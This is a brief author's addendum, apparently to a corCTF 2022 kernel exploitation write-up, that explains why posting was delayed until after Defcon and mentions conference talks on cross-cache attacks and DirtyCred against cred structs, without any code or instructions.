Addendum: I originally wrote most of this immediately after corCTF 2022, but decided to post after Defcon 2022 due to time constraints as I was attending the CTF and the convention (shoutout to the All Roads Lead to GKE's Host presentation from StarLabs that talked about cross cache in great depth too!). During Defcon, 0xTen mentioned to me Markak's presentation on DirtyCred at Blackhat a week earlier, which demonstrated another novel approach to attack cred structs in scenarios of UAF/double-free/arbitrary-free via cross cache and has been successfully tested on older CVEs. I guess this cross cache technique has truly revived cred objects as a viable target for exploitation in the most common classes of memory safety bugs 😎